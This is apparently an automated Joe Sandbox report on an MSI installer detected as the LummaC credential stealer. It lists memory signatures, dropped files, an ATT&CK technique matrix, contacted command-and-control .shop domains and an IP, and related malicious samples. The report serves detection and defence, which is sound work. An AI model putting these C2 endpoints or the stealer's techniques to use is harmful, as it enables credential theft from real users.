Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior

Source: Yara match	File source: 00000017.00000003.3156346560.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.3198982673.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.3156175797.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.3155203388.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.3179568692.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.3182152456.0000000001173000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.3196037635.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.3179989281.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Dicks.pif PID: 3248, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Dicks.pif PID: 3248, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_000A696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		19_2_000A696E
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_000A6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		19_2_000A6E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	1 Replication Through Removable Media	1 Native API	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	11 Peripheral Device Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	21 Input Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	21 Access Token Manipulation	1 Software Packing	NTDS	12 File and Directory Discovery	Distributed Component Object Model	3 Clipboard Data	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	112 Process Injection	1 DLL Side-Loading	LSA Secrets	38 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	251 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	122 Masquerading	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	112 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
NB4EASbynx.msi	18%	ReversingLabs	Win32.Spyware.Lummastealer

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	7%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI4F6E.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI5124.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI523E.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI527E.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI52AE.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI537A.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	8%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIC706.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIEA27.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIEA95.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIEAB6.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://warrantelespsz.shop/	0%	Avira URL Cloud	safe
https://www.autoitscript.com/autoit3/	0%	Avira URL Cloud	safe
https://warrantelespsz.shop:443/api	100%	Avira URL Cloud	malware
https://warrantelespsz.shop/apiOR	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
lariatedzugspd.shop	0%	Avira URL Cloud	safe
https://warrantelespsz.shop:443/apiMicrosoft	0%	Avira URL Cloud	safe
https://warrantelespsz.shop/N	0%	Avira URL Cloud	safe
https://warrantelespsz.shop:443/api0-	0%	Avira URL Cloud	safe
https://warrantelespsz.shop/fe	0%	Avira URL Cloud	safe
https://warrantelespsz.shop/api7N/	0%	Avira URL Cloud	safe
callosallsaospz.shop	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://warrantelespsz.shop/apiBNz	0%	Avira URL Cloud	safe
https://www.mozilla.or	0%	Avira URL Cloud	safe
https://warrantelespsz.shop/api	100%	Avira URL Cloud	malware
https://warrantelespsz.sho8	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
liernessfornicsa.shop	0%	Avira URL Cloud	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://warrantelespsz.shop/pim	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
shepherdlyopzc.shop	0%	Avira URL Cloud	safe
https://warrantelespsz.shop/pid	0%	Avira URL Cloud	safe
https://warrantelespsz.shop/ob	0%	Avira URL Cloud	safe
warrantelespsz.shop	0%	Avira URL Cloud	safe
upknittsoappz.shop	0%	Avira URL Cloud	safe
outpointsozp.shop	0%	Avira URL Cloud	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	0%	Avira URL Cloud	safe
https://warrantelespsz.shop/ta	0%	Avira URL Cloud	safe
https://warrantelespsz.shop/pi	0%	Avira URL Cloud	safe
unseaffarignsk.shop	0%	Avira URL Cloud	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
warrantelespsz.shop	188.114.96.3	true	true		unknown
fDwYocEDWIyxswuSuKqfrffGAPh.fDwYocEDWIyxswuSuKqfrffGAPh	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
lariatedzugspd.shop	true	Avira URL Cloud: safe	unknown
callosallsaospz.shop	true	Avira URL Cloud: safe	unknown
liernessfornicsa.shop	true	Avira URL Cloud: safe	unknown
https://warrantelespsz.shop/api	false	Avira URL Cloud: malware	unknown
shepherdlyopzc.shop	true	Avira URL Cloud: safe	unknown
warrantelespsz.shop	true	Avira URL Cloud: safe	unknown
upknittsoappz.shop	true	Avira URL Cloud: safe	unknown
outpointsozp.shop	true	Avira URL Cloud: safe	unknown
unseaffarignsk.shop	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://warrantelespsz.shop:443/api	Dicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://warrantelespsz.shop:443/api0-	Dicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://warrantelespsz.shop/	Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://warrantelespsz.shop/apiOR	Dicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://warrantelespsz.shop/N	Dicks.pif, 00000017.00000003.3155264925.0000000001173000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://warrantelespsz.shop:443/apiMicrosoft	Dicks.pif, 00000017.00000003.3182124941.000000000341A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.dr	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://warrantelespsz.sho8	Dicks.pif, 00000017.00000003.3155264925.0000000001173000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://warrantelespsz.shop/fe	Dicks.pif, 00000017.00000003.3196037635.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://warrantelespsz.shop/api7N/	Dicks.pif, 00000017.00000003.3234780524.0000000001173000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	Dicks.pif, 00000017.00000003.3181638949.0000000003533000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.mozilla.or	Dicks.pif, 00000017.00000003.3181573889.000000000343C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://warrantelespsz.shop/apiBNz	Dicks.pif, 00000017.00000003.3264421996.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266103716.0000000001173000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	Dicks.pif, 00000013.00000000.2532080897.00000000000F9000.00000002.00000001.01000000.0000000A.sdmp, Dicks.pif, 00000017.00000002.3265460967.00000000000F9000.00000002.00000001.01000000.0000000A.sdmp, Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Notify.8.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://warrantelespsz.shop/ob	Dicks.pif, 00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3196037635.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://warrantelespsz.shop/pim	Dicks.pif, 00000017.00000003.3264715151.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://warrantelespsz.shop/pid	Dicks.pif, 00000017.00000003.3264715151.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266151396.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	SymposiumTaiwan.exe, 00000008.00000000.2491029205.0000000000409000.00000002.00000001.01000000.00000009.sdmp, SymposiumTaiwan.exe, 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmp, SymposiumTaiwan.exe.4.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Dicks.pif, 00000017.00000003.3181638949.0000000003533000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://warrantelespsz.shop/pi	Dicks.pif, 00000017.00000003.3264715151.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266151396.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3234579909.00000000011D0000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3179568692.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://warrantelespsz.shop/ta	Dicks.pif, 00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	warrantelespsz.shop	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1481471
Start date and time:	2024-07-25 09:51:32 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NB4EASbynx.msi renamed because original name is a hash value
Original Sample Name:	3b48c90d4a283982ced898df9570894b.msi
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winMSI@33/67@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 182 Number of non-executed functions: 222
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: NB4EASbynx.msi

Simulations

Behavior and APIs

Time	Type	Description
03:53:00	API Interceptor	1x Sleep call for process: SymposiumTaiwan.exe modified
03:53:42	API Interceptor	35x Sleep call for process: Dicks.pif modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	LisectAVT_2403002B_352.exe	Get hash	malicious	Unknown	Browse	avkit.org/home/getconverter/?id=4
	LisectAVT_2403002B_352.exe	Get hash	malicious	Unknown	Browse	avkit.org/home/getconverter/?id=4
	https://www.trypineappledigital.agency/	Get hash	malicious	Unknown	Browse	daytimeadmirable.icu/favicon.ico
	Quotation.xls	Get hash	malicious	Remcos	Browse	tny.wtf/jk8Z5I
	DRAFT AWB and DRAFT Commercial invoice.xls	Get hash	malicious	Remcos	Browse	tny.wtf/cyd
	S004232824113048.xls	Get hash	malicious	Remcos, DBatLoader	Browse	wx.ax/Xm6
	http://comicextra.me/favicon.ico	Get hash	malicious	Unknown	Browse	comicextra.org/favicon.ico
	AED 47,000.exe	Get hash	malicious	FormBook	Browse	www.yi992.com/iuti/
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/eadkqsUM/download
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/4jaIXkvS/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
warrantelespsz.shop	wxNXR3EdaH.msi	Get hash	malicious	LummaC	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Scan file.doc	Get hash	malicious	Unknown	Browse	188.114.96.3
	LisectAVT_2403002C_15.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	LisectAVT_2403002C_16.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	nX1oQE2we8.exe	Get hash	malicious	CryptOne, Qbot	Browse	104.21.34.74
	LisectAVT_2403002C_18.exe	Get hash	malicious	Raccoon	Browse	188.114.96.3
	gbl.exe	Get hash	malicious	Unknown	Browse	104.26.4.75
	LisectAVT_2403002C_18.exe	Get hash	malicious	Raccoon	Browse	188.114.97.3
	gbl.exe	Get hash	malicious	Unknown	Browse	172.67.68.40
	https://forms.office.com/Pages/ResponsePage.aspx?id=kAi_W0yZC0qQpKIHxTYoPxauHzsZJkZMuCk5U9e1Y4RUNFlCMDNQTTdIRTdLV0dKQ1lOUjJYQjg4Si4u&origin=Invitation&channel=0	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Payroll for July.exe	Get hash	malicious	Remcos, DBatLoader	Browse	188.114.96.3
	2nd_Quarter_Order_Sheet_xls_0000000000000000000.exe	Get hash	malicious	Remcos, DBatLoader	Browse	188.114.96.3
	CWS610973I4SC2024.exe	Get hash	malicious	DBatLoader	Browse	188.114.96.3
	Import_Tax Invoice_PL_xls_0000000000000000000 .exe	Get hash	malicious	Remcos, DBatLoader	Browse	188.114.96.3
	Quotation .exe	Get hash	malicious	Remcos, DBatLoader	Browse	188.114.96.3
	Request Quotation.exe	Get hash	malicious	Remcos, DBatLoader	Browse	188.114.96.3
	MT103 BANK ERROR.PDF.exe	Get hash	malicious	Remcos, DBatLoader	Browse	188.114.96.3
	Purchase Order 108099.exe	Get hash	malicious	DBatLoader	Browse	188.114.96.3
	CWS610973I4SC2024.exe	Get hash	malicious	DBatLoader	Browse	188.114.96.3
	3AcGdb5sdS.exe	Get hash	malicious	CobaltStrike	Browse	188.114.96.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	LisectAVT_2403002A_117.exe	Get hash	malicious	RedLine	Browse
	wxNXR3EdaH.msi	Get hash	malicious	LummaC	Browse
	main.exe	Get hash	malicious	Unknown	Browse
	main.exe	Get hash	malicious	Unknown	Browse
	main.exe	Get hash	malicious	Unknown	Browse
	main.exe	Get hash	malicious	Unknown	Browse
	main.exe	Get hash	malicious	Unknown	Browse
	lSmb6nDsrC.exe	Get hash	malicious	SmokeLoader	Browse
	giupload.exe	Get hash	malicious	LummaC	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.27778.32115.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\MSI4F6E.tmp	wxNXR3EdaH.msi	Get hash	malicious	LummaC	Browse
	6OiUEubyA8.msi	Get hash	malicious	Quasar	Browse
	Estimado_1546359641.155196.msi	Get hash	malicious	VMdetect	Browse

Created / dropped Files

C:\Config.Msi\68e8f0.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	7799
Entropy (8bit):	5.557195037801374
Encrypted:	false
